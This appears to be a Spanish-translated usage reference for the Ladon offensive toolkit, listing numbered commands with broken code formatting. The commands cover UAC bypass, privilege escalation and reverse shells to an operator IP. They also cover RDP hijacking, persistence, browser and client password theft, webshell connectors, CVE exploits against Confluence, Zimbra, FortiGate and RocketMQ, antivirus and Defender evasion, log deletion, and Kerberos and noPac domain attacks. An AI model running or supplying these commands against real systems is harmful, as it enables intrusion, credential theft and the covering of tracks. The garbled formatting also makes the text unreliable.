Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 Ejecutar sorteando UAC, compatible con Win7-Win10 10.8 versión eliminada, solo 911 retenido```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) exploit de escalada de privilegios de vulnerabilidad de impresora EXP```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool exploit de escalación de privilegios de vulnerabilidad de impresora```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem Elevación de privilegios a System para ejecutar CMD```Bash
Ladon GetSystem cmd.exe
114 copiar token para ejecutar CMD (por ejemplo, degradar privilegios de system al usuario actual de exploer)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas simular ejecución de comandos como usuario```Bash
Ladon Runas user pass cmd
116 MS16135 escalación de privilegios a SYSTEM```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato elevación de privilegios de usuario de servicio a SYSTEM```Bash
Ladon BadPotato cmdline
118 Elevación de privilegios de usuario de servicio SweetPotato a SYSTEM```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 escalada de privilegios (de usuario de servicio a system)```Bash
Ladon EfsPotato whoami
120 Open3389 abrir 3389 con un clic```Bash

Ladon Open3389

root@kitploit:~
##### 121 Activar Administrador integrado```Bash
Ladon ActiveAdmin
122 Activar usuario integrado Guest```Bash

Ladon ActiveGuest

root@kitploit:~
### Shell inversa

##### 123 Shell inversa TCP NC```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 Shell TCP inverso MSF```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 Inversa TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 Reverse HTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 Reverse HTTPS MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 Reverso TCP CMD y PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 Shell inverso UDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 Reenvío del puerto 888 local de netsh al puerto 22 de 112```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTran reenvío de puertos (ejemplo 3389)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

Ejecución local

132 Secuestro de sesión de escritorio RDP (sin contraseña)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 Agregar elemento de inicio Run del registro```Bash
Ladon RegAuto Test c:\123.exe
134 Programa de ejecución de tareas AT (sin tiempo) (permisos de sistema)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 Servicio SC agregar elemento de inicio y ejecutar programa (privilegios de SYSTEM)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

Detección de información del sistema

136 Detección de sistema operativo, dispositivos y otra información mediante el protocolo Snmp```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  Detección de nombre de host, dominio y usuario de Windows mediante el protocolo Nbt```Bash
Ladon 192.168.1.8/24 NbtInfo
138 Detección de versión de Windows, nombre de host y dominio mediante protocolo SMB```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  Detección de versión de Windows, nombre de host y dominio mediante protocolo Wmi```Bash
Ladon 192.168.1.8/24 WmiInfo
140 Detección de versión de Windows, nombre de host y dominio mediante protocolo Mssql```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  Detectar versión de Windows, nombre de host, dominio mediante protocolo Winrm```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Detección de versión de Windows, nombre de host y dominio de Exchange```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  Detección de versión de Windows, nombre de host y dominio mediante protocolo RDP```Bash
Ladon 192.168.1.8/24 RdpInfo

Otras funciones

144 Win2008 un clic para habilitar .net 3.5```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 Obtener el código fuente HTML del sitio de la intranet```Bash
Ladon gethtml http://192.168.1.1
146 Servidor web mini con un clic - Servidor web dedicado para monitoreo de penetración```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
Obtener IP externa (iniciar WEB en VPS, objetivo accede a ip.txt o ip.jpg)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt (Resultado de devolución de vulnerabilidad sin eco)
##### Escuchar```Bash
Ladon web 800
Enviar y devolver texto plano```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Resultado de codificación Base64```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Descifrado de resultados Base64```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 Detección de complemento Shiro```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat Eliminar registros de IP especificados de Tomcat```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 Escaneo de complementos de ensamblaje personalizado en C#```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile Leer contenido de un archivo grande desde el inicio hasta una longitud especificada```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 Modificar el registro para leer contraseñas en texto plano de sistemas 2012 y posteriores```Bash
Ladon SetMzLogonPwd 1
153 Modificar la verificación de firma de secuestro del registro```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 Conversión por lotes de IP a formato ip24(192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC Conversión por lotes de IP a formato C IP (192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB  Convertir IPs en lote al formato IP B (192.168.)```Bash
Ladon ip.txt IPB
157 Detección de vulnerabilidad Atlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134Shell inversa```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo Detección de certificados: dispositivos, IP, dominios, nombres de máquina, organización y otra información```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo Detección masiva de certificados de dispositivos, IPs, nombres de dominio, nombres de máquina, organizaciones y otra información```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo Múltiples métodos para obtener la versión del programa principal, temas y plugins de WordPress```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo Obtener por lotes las versiones del núcleo, temas y plugins de WordPress```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  Ataque de fuerza bruta a Exchange  Identificar ataque de fuerza bruta de contraseñas de Exchange```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 Detección masiva de vulnerabilidad RCE de salto de directorio ZIP en servidor de correo Zimbra```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbra servidor de correo EXP de vulnerabilidad RCE no autorizada GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd Conectar WebShell jsp (soporta cd, k8, ua, uab64)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell Ver la versión del sistema, python, gcc y otra información para facilitar la escalada de privilegios```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd conectar jsp WebShell (soporta cd, k8, ua, uab64)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 Comando de ejecución de backdoor de conexión no interactiva IIS-Raid```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP comprueba si el segmento IP aparece en los resultados de vulnerabilidades```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 Lectura de contraseña de router```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc Detección por lotes de vulnerabilidad de ejecución arbitraria de código PJL en impresoras```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 Consultar fabricante por Mac (Ladon Mac MAC地址)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Ataque de fuerza bruta a contraseñas de router VPN Cisco (contraseñas predeterminadas incorporadas, soporta texto plano y Hash)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 Detección de vulnerabilidad de puerta trasera smiley  Eliminado en 10.9```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan Auditoría de contraseñas y contraseñas débiles de WordPress```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Detectar versión de Exchange```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Detección de vulnerabilidad RCE de alto riesgo en Exchange```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Obtener información de cabecera de respuesta web con Http/S```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S Obtener encabezados de respuesta de página web + código fuente```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S obtener nombres de dominio en páginas web```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP bypass CDN obtener IP real del dominio (características únicas de palabras clave como nombre de dominio, título, Banner, etc.)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Contraseñas de Firefox\Cookie\Lectura del historial```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 sin eco compatible con Win7, Win8, Win11, Win2012\2016\2019, etc. versión 10.8 eliminada```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd soporta lectura de contraseñas de Navicat, TeamView, Xshell, SecureCRT```Bash
Ladon GetPwd
186 DraytekScan auditoría de contraseñas detección de contraseñas débiles Draytek```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Lectura de contraseñas de Xshell```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 Escritura no autorizada de SSH-KEY admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  Ejecución remota de comandos en SQL Server  Versión de SQL, información del SO  xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd Ejecución remota de comandos en SQL Server, escalada de privilegios con efspotato y badpotato```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42 lectura de contraseña```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan Detección de contraseña predeterminada web para routers y ONT ZTE```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 Lectura de contraseñas del router MSNSwitch```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd Lectura de contraseñas del router NetGear DGND3700v2```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 Detección de la versión de WebLogic mediante el protocolo T3```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

Penetración con un clic InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan múltiples módulos detectan información del sistema```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan Detección de múltiples vulnerabilidades remotas```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan múltiples explotaciones de vulnerabilidades GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 Lectura no autorizada de la contraseña de la base de datos del sitio web```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan todos los módulos```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Detectar versión de Citrix Gateway```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 Detección de la versión de Vmware Vcenter```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 Sortear Defender para ejecutar PowerShell```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 Reiniciar impresora HP mediante SNMP```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 Limpiar registros de operaciones Deshabilitar registro de .NET```Bash
Ladon Clslog
206 Protocolo ARP para detección de hosts activos```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 Mini servidor FTP (compatible con comandos ftp incorporados de Windows/Linux para carga y descarga de archivos)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 Monitorear datos de paquetes TCP, guardar TXT y HEX, como SMB, RDP, HTTP, SSH, LDAP, FTP, etc.```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 Monitorear paquetes UDP enviados, guardar en TXT y HEX, como los protocolos DNS, SNMP, etc.```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward Reenvío de puertos Redirección de puertos```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
211 CVE-2022-36537	Server Backup Manager Detección de vulnerabilidad RCE no autorizada (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper EXP de lectura de archivos no autorizada (por defecto/WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 Deshabilitar completamente SMB, deshabilitar el puerto 445 para prevenir ataques de día cero, movimiento lateral, ataques de retransmisión, etc.```Bash
Ladon CloseSMB
214 Deshabilitar servicio específico```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 Detener el servicio especificado```Bash
Ladon StopService Spooler
216 Puerto permitido Puerto abierto```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 bloquear puerto interceptar puerto```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken - Programa de ejecución de copia de tokens```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 Elevación de privilegios RunSystem: de administrador a privilegios SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser reducción de privilegios de sistema a ejecución de usuario```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato escalación de privilegios Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision Hikvision auditoría de contraseñas```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision 海康威视 detección de vulnerabilidad CVE-2017-7921```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision 海康威视 descifrado de archivos de configuración```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladon CmdShell para pruebas```Bash
Ladon web 800 cmd
226 CmdShell dedicado para pruebas de conexión```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 Ver administrador de dominio```Bash
Ladon QueryAdminDomain
228 Ver información de dominio```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 Detección por difusión del protocolo Mndp de información de routers Mikrotik en el mismo segmento de red```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 Herramienta de conexión PostShell, compatible con envío de cabeceras HTTP personalizadas```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  ejecutar comando Cmd / compatible con b64cmd```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 Ver IP del administrador, leer registro de inicio de sesión exitoso 4624 con un clic```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 EXP de vulnerabilidad de ejecución remota de comandos```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladon herramienta de evasión de antivirus con un solo clic```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Escalada de privilegios a system en Win11/2022```Bash	
Ladon McpPotato whoami
236 EXE a HEX, comando CMD escribir archivo```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 Convertir EXE a Base64, escribir archivo mediante comando CMD```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Detección de versión del sistema de correo Zimbra```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO Herramienta de penetración de dominio y movimiento lateral mediante directivas de grupo```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 Obtención con un clic de información del sitio web IIS```Bash

Ladon IisInfo

root@kitploit:~
##### 241 Servidor WEB de penetración dedicado a deserialización LDAP```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 Servidor WEB dedicado a penetración para deserialización RMI```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 Agregar administrador de API (ignorando la desactivación del sistema net, net1)```Bash	
Ladon AddAdmin admin$ 123456
244 Añadir usuario mediante API (ignorar deshabilitación de net, net1.exe del sistema)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 API eliminar usuario (ignora la deshabilitación del sistema net, net1.exe)```Bash	
Ladon DelUser admin$
246 Rubeus de penetración de dominio Ataques Kerberos

Por ejemplo: solicitudes TGT / solicitudes ST / AS-REP Roasting / Kerberoasting / ataques de delegación / Golden Ticket / Silver Ticket / Diamond Ticket / Sapphire Ticket, etc.```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac penetración de dominio escalada de privilegios en dominioCVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
